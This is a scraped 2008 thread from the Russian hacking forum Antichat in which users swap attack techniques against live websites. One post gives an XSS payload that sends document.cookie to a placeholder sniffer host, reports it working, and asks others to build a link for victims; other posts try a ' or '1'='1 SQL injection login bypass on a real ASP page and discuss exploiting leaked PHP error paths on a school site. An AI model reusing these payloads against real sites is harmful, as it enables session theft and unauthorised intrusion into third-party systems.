Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
28.11.2008, 19:44
|
|
Новичок
Регистрация: 22.11.2008
Сообщений: 5
Провел на форуме:
88733
Репутация:
0
|
|
Сообщение от ChaaK
Смотрю: олени в теме  Хм, я возможно и не шарю, но если я не ошибся тема как раз таки для вопросов по уязвимостям. Так что думаю можно и без оленей обойтись)
Сообщение от ChaaK
Вообщем если пашка дуров не поставил:
PHP код:
<?php
echo $_GET['имя_поля'];
?>
То ничего не сделал, а он действительно не поставил  А здесь можно поподробней? Возможно данные в форму передать каким нибудь образом?
|
|
|
28.11.2008, 19:52
|
|
Новичок
Регистрация: 02.06.2008
Сообщений: 3
Провел на форуме:
29386
Репутация:
0
|
|
Это уже пофиксено все... думаю надо копать глубже.. и еще всетаки интересно в привате есть сплойты или нет..
|
|
|
|
28.11.2008, 20:08
|
|
Участник форума
Регистрация: 26.11.2008
Сообщений: 167
Провел на форуме:
1025333
Репутация:
112
|
|
Сообщение от .::Colt::.
Это уже пофиксено все... думаю надо копать глубже.. и еще всетаки интересно в привате есть сплойты или нет..
всё работает!!!!
"><script>img = new Image(); img.src = "http://блаблаблабла?"+document.cookie;</script>
и куки на снифе!!!
ктонить составьте ссылку
|
|
|
|
28.11.2008, 20:13
|
|
Новичок
Регистрация: 02.06.2008
Сообщений: 3
Провел на форуме:
29386
Репутация:
0
|
|
Сообщение от qazer
всё работает!!!!
"><script>img = new Image(); img.src = "http://блаблаблабла?"+document.cookie;</script>
и куки на снифе!!!
ктонить составьте ссылку
я говорил про вконтакте.ру
|
|
|
|
28.11.2008, 20:18
|
|
Познавший АНТИЧАТ
Регистрация: 01.06.2008
Сообщений: 1,047
Провел на форуме:
5321514
Репутация:
3313
|
|
Сообщение от winter_silence
Хм, я возможно и не шарю, но если я не ошибся тема как раз таки для вопросов по уязвимостям. Так что думаю можно и без оленей обойтись)
А здесь можно поподробней? Возможно данные в форму передать каким нибудь образом?
никаким, если только юзер сам не вставит код
|
|
|
|
28.11.2008, 21:02
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
Нашел уязвимость с Ассеsse, пытаюсь авторизоваться по типу:
user = ' or '1'='1
pass = test
Но выбрасывает на ошибку с
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC Microsoft Access Driver]General error Unable to open registry key 'Temporary (volatile) Jet DSN for process 0x17ec Thread 0x1420 DBC 0x31b710c Jet'.
/riservata.asp, line 18
Расшифруйте, пожалуйста, что тут не так. если дословно: общая ошибка открытом регистрационном ключе, DNS процесса и бла-бла-ла |
|
|
|
29.11.2008, 01:23
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
Calcutta, всё поддерживается, не сбивай людей с толку!
|
|
|
|
29.11.2008, 01:56
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
Я все делал по статье. все верно.
Еще выяснил, что при любом запросе:
админ:админ.
лол:кол
выбрасывает на ошибку. Может такое быть, что авторизоваться не получится?
|
|
|
|
29.11.2008, 05:49
|
|
Постоянный
Регистрация: 27.10.2008
Сообщений: 491
Провел на форуме:
4002393
Репутация:
464
|
|
Warning: require_once(maincore.php) [function.require-once]: failed to open stream: Operation not permitted in /www/hmarka.net/3/8/38school/home/site/news.php on line 12
Fatal error: require_once() [function.require]: Failed opening required 'maincore.php' (include_path='.:/usr/share/php') in /www/hmarka.net/3/8/38school/home/site/news.php on line 12
ето че такое и как етим воспользоваться???
|
|
|
|
29.11.2008, 06:28
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
увидеть пути ..
возрадоватся что ошибки не отключены в этом скрипте, и возможно на всём сайте, что очень облегчит дальнейший взлом..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
